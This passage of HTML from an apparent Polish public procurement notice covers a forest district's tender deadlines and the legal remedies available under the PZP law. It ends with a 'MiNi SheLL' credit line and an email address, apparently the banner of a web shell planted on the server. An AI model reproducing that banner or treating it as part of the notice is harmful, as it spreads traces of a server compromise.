Wykonawcy. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_dukla/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 19.1. Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu<br/>zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez<br/>Zamawiającego przepisów PZP, przysługują środki ochrony prawnej określone w dziale<br/>IX PZP tj. odwołanie i skarga do sądu. Postępowanie odwoławcze uregulowane zostało<br/>w przepisach art. 506-578 PZP, a postępowanie skargowe w przepisach art. 579-590<br/>PZP.<br/>19.2. Odwołanie przysługuje na:<br/>1) niezgodną z przepisami PZP czynność Zamawiającego, podjętą w postępowaniu o<br/>udzielenie zamówienia, w tym na projektowane postanowienie umowy;<br/>2) zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której<br/>Zamawiający był obowiązany na podstawie PZP;<br/>3) zaniechanie przeprowadzenia postępowania o udzielenie zamówienia na<br/>podstawie PZP, mimo że Zamawiający był do tego obowiązany.<br/>19.3. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej. Odwołujący przekazuje<br/>Zamawiającemu odwołanie wniesione w formie elektronicznej albo w postaci<br/>elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie<br/>pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on<br/>zapoznać się z jego treścią przed upływem tego terminu. Domniemywa się, że<br/>Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego<br/>wniesienia, jeżeli przekazanie odpowiednio odwołania albo jego kopii nastąpiło przed<br/>upływem terminu do jego wniesienia przy użyciu środków komunikacji elektronicznej.<br/>19.4. Odwołanie wnosi się w terminie: (a) 10 dni od dnia przekazania informacji o czynności<br/>Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została<br/>przekazana przy użyciu środków komunikacji elektronicznej, (b) 15 dni od dnia<br/>przekazania informacji o czynności Zamawiającego stanowiącej podstawę jego<br/>wniesienia, jeżeli informacja została przekazana w sposób inny niż określony w lit. (a).<br/>19.5. Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie<br/>zamówienia lub wobec treści dokumentów zamówienia wnosi się w terminie 10 dni od<br/>dnia publikacji ogłoszenia w Dzienniku Urzędowym Unii Europejskiej lub<br/>zamieszczenia dokumentów zamówienia na stronie internetowej.<br/>19.6. Odwołanie w przypadkach innych niż określone w pkt 19.4. i 19.5 SWZ wnosi się w<br/>terminie 10 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności<br/>można było powziąć wiadomość o okolicznościach stanowiących podstawę jego<br/>wniesienia.<br/>19.7. Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby<br/>Odwoławczej, o którym mowa w art. 519 ust. 1 PZP, stronom oraz uczestnikom<br/>postępowania przysługuje skarga do sądu. Skargę wnosi się do Sądu Okręgowego w<br/>Warszawie - sądu zamówień publicznych. Skargę wnosi się za pośrednictwem Prezesa<br/>Krajowej Izby Odwoławczej, w terminie 14 dni od dnia doręczenia orzeczenia Krajowej<br/>Izby Odwoławczej lub postanowienia Prezesa Krajowej Izby Odwoławczej, o którym<br/>mowa w art. 519 ust. 1 PZP, przesyłając jednocześnie jej odpis przeciwnikowi skargi.<br/>Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu ustawy<br/>z dnia 23 listopada 2012 r. - Prawo pocztowe (tekst jedn. Dz. U. z 2022 r. poz.896 z późn.<br/>zm.), jest równoznaczne z jej wniesieniem.

Creat By MiNi SheLL
Email: jattceo@gmail.com